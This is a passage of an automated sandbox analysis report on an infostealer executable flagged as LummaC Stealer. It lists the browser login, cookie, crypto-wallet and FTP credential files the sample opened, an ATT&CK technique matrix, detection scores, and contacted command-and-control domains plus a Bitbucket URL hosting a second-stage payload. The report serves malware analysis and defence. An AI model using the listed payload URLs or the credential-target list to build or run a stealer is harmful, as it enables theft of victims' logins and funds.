Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\GJBHWQDROJ	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\GJBHWQDROJ	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\ZUYYDJDFVF	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\ZUYYDJDFVF	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\FAAGWHBVUU	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\FAAGWHBVUU	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1404582172.0000000001529000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2oM46LNCOo.exe PID: 7284, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 2oM46LNCOo.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	41 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Process Injection	LSASS Memory	851 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2oM46LNCOo.exe	46%	Virustotal		Browse
2oM46LNCOo.exe	63%	ReversingLabs	Win32.Infostealer.Tinba
2oM46LNCOo.exe	100%	Avira	TR/Crypt.TPM.Gen
2oM46LNCOo.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://observerfry.lat/apis	0%	Avira URL Cloud	safe
https://observerfry.lat/piN	0%	Avira URL Cloud	safe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	0%	Avira URL Cloud	safe
https://observerfry.lat/apix	0%	Avira URL Cloud	safe
https://observerfry.lat/Q	0%	Avira URL Cloud	safe
https://dz8aopenkvv6s.cloudfront.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	52.217.14.36	true	false	high
bitbucket.org	185.166.143.50	true	false	high
observerfry.lat	172.67.199.72	true	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
curverpluch.lat	false	high
slipperyloo.lat	false	high
tentabatte.lat	false	high
manyrestro.lat	false	high
bashfulacid.lat	false	high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe	false	high
observerfry.lat	false	high
wordyfindy.lat	false	high
https://observerfry.lat/api	false	high
shapestickyr.lat	false	high
talkynicer.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0	2oM46LNCOo.exe, 00000002.00000002.1885827492.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-	2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D50000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/apis	2oM46LNCOo.exe, 00000002.00000003.1511641547.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://observerfry.lat/pi	2oM46LNCOo.exe, 00000002.00000003.1438546515.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bitbucket.org/3S	2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bitbucket.org/_	2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/piN	2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bitbucket.org/f	2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/apix	2oM46LNCOo.exe, 00000002.00000003.1425834485.000000000158E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/Q	2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1368140153.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1439414268.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1397400304.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1452024343.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1369759598.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438667211.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511624035.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1398164398.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1374925194.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404451499.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aui-cdn.atlassian.com/	2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886379427.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat:443/api	2oM46LNCOo.exe, 00000002.00000003.1368269136.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1370014291.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438703314.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426026271.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1344435777.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1368343590.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1374948031.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/	2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511665760.0000000001572000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe	2oM46LNCOo.exe, 00000002.00000003.1511602212.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.11.dr	false		high
https://observerfry.lat/	2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886070092.000000000151B000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1439414268.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1397400304.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438546515.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1452024343.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574302041.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438667211.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511624035.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1398164398.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 